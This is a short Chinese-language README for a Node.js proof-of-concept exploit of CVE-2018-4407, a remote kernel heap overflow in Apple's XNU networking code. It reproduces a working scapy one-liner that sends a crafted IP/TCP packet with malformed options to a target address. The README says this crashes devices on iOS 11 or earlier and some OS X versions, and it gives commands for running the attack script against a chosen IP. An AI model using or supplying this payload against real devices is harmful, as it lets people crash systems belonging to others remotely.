针对 CVE-2018-4407 的 Node.js PoC 利用代码
作者:Sam Decrock
该脚本基于 Zuk 提供的 scapy 脚本:
iOS 12 / OS X *远程内核堆溢出 (CVE-2018-4407) POC* 在一则推文中:
— Zuk (@ihackbanme) 2018年11月1日
pip install scapy
sudo scapy
send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
它会导致运行 iOS 11 或更早版本的设备以及某些版本的 OS X 崩溃。
要安装所需模块,请运行:
npm install
运行时,将目标 IP 地址作为参数传入:
node attack.js 192.168.1.20
原作者 Kevin Backhouse 的详细文章:https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407